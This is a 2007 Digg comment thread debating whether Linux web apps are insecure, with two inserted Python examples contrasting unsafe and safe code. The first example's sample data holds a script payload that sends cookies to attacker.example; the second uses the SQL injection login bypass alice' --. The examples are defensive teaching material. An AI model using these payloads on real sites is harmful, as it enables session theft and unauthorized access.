35 Comments
- kgool, on 10/12/2007, -0/+18 Was it just me, or was there not a lot of meat in that story?
- rchtr, on 10/12/2007, -1/+12 Any web app is only as secure as the programmer makes it. There's nothing particularly, inherently insecure about Linux...
- delsdog, on 10/12/2007, -0/+6 I agree, it's not the fault of Linux that people make insecure apps.
- lolwtfhaha, on 10/12/2007, -1/+5 nevermind the potatoes
- nabiy, on 10/12/2007, -0/+3 This has been a hot topic lately. Here is an interview with Dr. Crispin Cowan on the subject: http://neworder.box.sk/news/15197 In the interview he talks a bit about some viable options for dealing with this security risk. - nabiy
- babozor, on 10/12/2007, -1/+4 It's not really specific to Linux open-source technology (PHP, Perl, etc.)... if your web app is on a server just 'out of the box' you could expect some leaks; that's why we need good network admins and system admins so much... but it doesn't really depend on the code itself (except for a few examples I saw which were surely typed with feet).
- unsliced, on 10/12/2007, -0/+3 Right - but if it starts people thinking, it's a good thing. Many people are running their own boxen as servers to the world yet probably don't even give security a second thought.
Can't hurt to flag up that most of us don't actually know as much as we think we do.
- inactive, on 10/12/2007, -0/+3 Shut the hell up with the comments saying "oh, this language sucks, it's insecure, it's not Linux that's insecure", blah blah.
Stop over-analyzing the article and be proactive and think about how you yourself can secure your web app instead of contemplating how the article could have been worded better.
In my personal opinion, code in whatever language you feel comfortable in. That being said, by comfortable I mean being able to code the long way and eliminate security holes before they can even begin.
- mike503, on 10/12/2007, -1/+3 Web 2.0 stuff is heavy on things like AJAX, and with the levels of stupidity in the world, everyone thinks they can just drop in some code. Just like a ton of people who "code PHP" leave basic things unchecked and easily exploitable. XSS and inline variable replacement are probably the biggest issues in "web 2.0" - also HTML-encoding anything that makes sense (some people I know have never faced that issue...)
Last but not least, people need to remember to TRY to hack or break their own sites/code. Don't wait for someone else to. I'm replying to your comment but it's really just a general-purpose comment too.
Where's the meat? Google this stuff. Sites like networkworld.com will never really have anything good on them. It's meant for ***** managers in IT to talk about over coffee...
- gtdfaniam, on 10/12/2007, -0/+2 A web application security article with no code snippets or explicit tips on what to look out for is about as useful as a banana in a gunfight.
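An added example (not from the article or any commenter) of the two points mike503 raises above: "inline variable replacement" dropping request data straight into markup, and HTML-encoding it instead. The template, the `render_*` functions and the sample comments are all constructed for this illustration; the attribute-breakout payload shows why the encoding has to cover quotes as well as angle brackets.

```python
import html

# Constructed sample inputs for this example (not taken from the page):
# an ordinary comment, a script payload, and an attribute-breakout payload.
SAMPLE_COMMENTS = [
    "Nice write-up, thanks!",
    "<script>new Image().src='http://attacker.example/?c='+document.cookie</script>",
    '" onmouseover="alert(1)',
]

# The template below contains exactly four tags of its own; any '<' beyond
# that in the rendered output was contributed by untrusted input.
TEMPLATE_TAG_COUNT = 4


def render_unsafe(author, comment):
    """'Inline variable replacement': untrusted strings dropped straight into
    the markup. author lands inside a quoted attribute, comment inside element
    text, and neither is encoded. This is the vulnerable pattern."""
    return f'<div class="post" data-author="{author}"><p>{comment}</p></div>'


def render_safe(author, comment):
    """Same markup, with every untrusted value HTML-encoded for its context.
    html.escape(quote=True) encodes < > & " and ', so a value can neither
    close the quoted attribute it sits in nor start a new tag."""
    return (
        f'<div class="post" data-author="{html.escape(author, quote=True)}">'
        f'<p>{html.escape(comment, quote=True)}</p></div>'
    )


def injected_tags(render, author, comment):
    """Number of '<' in the output beyond the template's own: a crude self-check
    of the 'try to break your own site' kind. It catches injected tags, but
    not an attribute breakout, which adds no tag at all (see the usage note)."""
    return render(author, comment).count("<") - TEMPLATE_TAG_COUNT


if __name__ == "__main__":
    for payload in SAMPLE_COMMENTS:
        print("unsafe:", render_unsafe(payload, payload))
        print("safe:  ", render_safe(payload, payload))
```

With the `<script>` payload as the comment, `injected_tags(render_unsafe, ...)` reports two extra tags and `render_safe` none. The `" onmouseover="alert(1)` payload as the author injects no tag at all in the unsafe version, yet still ends up as a live event handler, which is why a tag-counting check is not a substitute for encoding every value in its own context (text, attribute, URL and script contexts each need their own rules; `html.escape` covers only the first two).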
- TheStooge1, on 10/12/2007, -1/+3 The entire article basically said to watch what you were doing and where you were putting things. That's like saying you should be careful by putting doors on your house because if you don't lock them, someone could get in.
- haxx4, on 10/12/2007, -0/+2 I was thinking the same thing. It basically said "secure your web applications" without giving any ideas on how you should do that. No digg.
- Lazybones, on 10/12/2007, -1/+3 All true, but Linux evangelists are always saying how much more secure it is by design. That might be taken by some as "I don't need to worry, I run Linux". Bad thinking, but I have seen it.
- autodata, on 10/12/2007, -0/+2 Perl or perl, not PERL. Otherwise you might start asking me for my MAC's Mac address, thus raining havoc and chaos on our nerd sensibilities.
- v3xt0r, on 10/12/2007, -1/+3 Definitely more secure than your .NET or J2EE web applications.
- ronabop, on 10/12/2007, -0/+2 Hm. Teaser article.
- v3xt0r, on 10/12/2007, -0/+1 It is actually PERL, since it is an acronym for 'Practical Extraction and Reporting Language'.
I love when I see job ads for a Pearl Developer.
- Lazybones, on 10/12/2007, -0/+1 Yet have you seen what people put up on MySpace and Facebook? It is like people expect no one but their friends to look at this stuff, yet it is on a searchable public system.
Same can be said about novice web programmers... "If I didn't submit this to any search engines, no one will see it." Well, the search engines find it anyway.
- brianlmoon, on 10/12/2007, -0/+1 This has nothing to do with Linux. And frankly, PHP is the hot button for insecure web apps for the same reason that all viruses are written for Windows. They are both the most popular tool in their space for the average person.
- puggy, on 10/12/2007, -1/+2 "People just have to pay attention to what they're putting up there and realize that it's for the world to see, and for the world to toy with"
Not very insightful there.
- WorldBuilder, on 10/12/2007, -1/+2 "How secure are your Linux-based Web apps?"
Pretty darn secure, thanks for asking.
- irishfreakout, on 10/12/2007, -0/+1 I keep seeing all these "Security Holes with new web apps" or "Web 2.0's great security flaws"... and yet we haven't seen any actual evidence that holes actually exist.
- Zoplax, on 10/12/2007, -0/+1 Try doing a search for "index of /" through any search engine; you may see a lot of hits for Apache sites that are improperly secured to allow users to browse site directories.
- inactive, on 10/12/2007, -0/+1 People should have the smarts to go to Google and type "secure php application" in the big search box.
Of course, those people are the dumb pricks who do literally "slap together" applications with half-formed knowledge they gleaned from people who'd only half-learnt PHP off other half-learned idiots, so maybe the article should have linked to a Google search for them.
- Zoplax, on 10/12/2007, -0/+1 Oops, was editing and digg ate the rest of my sentence... Anyway, such a search can reveal .PHP and other source files the site owner probably wouldn't want open to the public intarnets.
- troydoogle7, on 10/12/2007, -0/+1 The reason PHP is so insecure is not down to the language itself but the laziness of developers. Each POST and GET should be checked and verified before it is processed. Webforms 2.0 will fix a lot of that.
Perhaps PHP should focus more on fixing it; however, there are issues such as the ease of launching a terminal program in Apache from a website that should just never happen. Easy commands such as "delete all" should never have the chance of being run from the web server. It's a trade-off between convenience and security. At the moment, convenience is winning. I hope this changes!
- ChaseVenters, on 10/12/2007, -0/+1 For the record, PHP has a huge problem here and Perl simply doesn't. "use strict", "use taint" and query placeholders in Perl's DBI will eliminate entire classes of attacks. Under "taint" and using query placeholders, you would have to go out of your way to write a vulnerable web app capable of hurting anything beyond itself.
Contrast this to PHP, the language that gave you register_globals, INI-global addslashes() processing, the most polluted namespace ever and a trillion users of string concatenation for SQL query generation.
I know which one I use :P
- radiofrequency, on 10/12/2007, -0/+1 This worthless story should be filed on Microsoft's site under the press release section. A pure FUD piece.
What about .asp/.net based web apps? Aren't those potentially as insecure as PHP and Perl scripts, if not more?
- dicroce, on 10/12/2007, -0/+1 Well, I am a C/C++ programmer. Have been for 11 years. Worked on a lot of embedded projects, a lot of Linux (even some kernel stuff)... And I use PHP on my server. Does that make me a "cursory" programmer?
Is digg.com a "cursory" site? Cause it's built on PHP...
I've looked at using Java on my server... Mostly because I like the language... But it's just the wrong tool for the job. Go ahead and stick with it though... The more of my competition that insists on driving nails with a screwdriver the better...
- krinthekuz, on 09/16/2008, -1/+1 Stupid articles. I love the trend as of late... 3-10 sentences of little informative content, often in size 11 or 12 font in a 150px wide column, accompanied by a 100px wide nav column for "important topics", another 100px wide nav column directly to other popular "articles", and then the rest of the screen (including the top banner) is smattered with ads. The bottom 80% of the page is then littered with affiliate links and personal links for PageRank, and who can forget the "sponsored links" box. Sadly, I think this is still better than news on the TV and in the newspaper.
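An added example (not from the article or any commenter) of the contrast ChaseVenters draws a few comments up, and of troydoogle7's point that every GET and POST value must be handled before it reaches the database: the same login query built by string concatenation and then with bound placeholders. It is written in Python against an in-memory SQLite database so it runs offline; the `?` placeholders have the same shape as Perl DBI's, and the table, users and attacker payload are all constructed for this illustration.

```python
import sqlite3

# Constructed sample data for this example (not from the page).
SAMPLE_USERS = [
    ("alice", "s3cret", "admin"),
    ("bob", "hunter2", "user"),
]


def make_db():
    """In-memory SQLite database standing in for the web app's backend."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (name TEXT PRIMARY KEY, password TEXT, role TEXT)"
    )
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


def login_concat(conn, user, password):
    """Query assembled by string concatenation, the pattern criticised above.
    Returns the matched user's role, or None. Whatever the request carried
    becomes part of the SQL text, so a quote or comment marker in it is
    parsed as SQL rather than as data."""
    sql = (
        "SELECT role FROM users WHERE name = '" + user
        + "' AND password = '" + password + "'"
    )
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_placeholder(conn, user, password):
    """Same query with bound parameters. The SQL text is fixed at authoring
    time; the driver ships the values separately, so nothing inside them can
    alter the statement's structure, whatever characters they contain."""
    row = conn.execute(
        "SELECT role FROM users WHERE name = ? AND password = ?",
        (user, password),
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    # Constructed payload: closes the quoted name, then '--' comments out the
    # rest of the line, including the password check.
    attacker_name = "alice' --"
    print("concat:     ", login_concat(db, attacker_name, "anything"))       # admin
    print("placeholder:", login_placeholder(db, attacker_name, "anything"))  # None
```

With the payload `alice' --` the concatenated statement becomes `... WHERE name = 'alice' --' AND password = 'anything'`, the password clause is commented away, and the attacker is logged in as admin without a password. The placeholder version looks for a user literally named `alice' --`, finds none, and returns None. Escaping helpers such as addslashes() try to patch the concatenated form after the fact and depend on the server's quoting and character-set rules being exactly what the escaper assumes; binding parameters removes the problem instead of patching it.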
- wwnexc, on 10/12/2007, -0/+0 Well, duh: if you don't set up a server correctly, it will be an easy target for sophisticated hackers or maybe even script kiddies. If you write crappy code, it has the same effect on the site's stability.
"Problem between keyboard and chair"
- tuxuser, on 10/12/2007, -5/+5 Is this some Linux hater? Cause I've had enough of this. If I see Linux or Mac hate, prepare to get modded. Laters haters
- wasname, on 10/12/2007, -0/+0 Any application you build has a certain amount of risk - and every platform has vulnerabilities. So.... what's the point of this article again?? Oh, who from M$ wrote it? Hmmm...
- gspeed, on 10/12/2007, -2/+0 How about... use a real programming language like Java and stop cutting corners. And yes... this has nothing to do with Linux and everything to do with the scripting languages lame cursory programmers use, like PHP.
- kgool, on 10/12/2007, -3/+1 Kind of reminds me of a lady who complained to a sysadmin I work with that their Linux box was perfectly secure, then they installed.........., and it got hacked. Something had to be wrong with the server.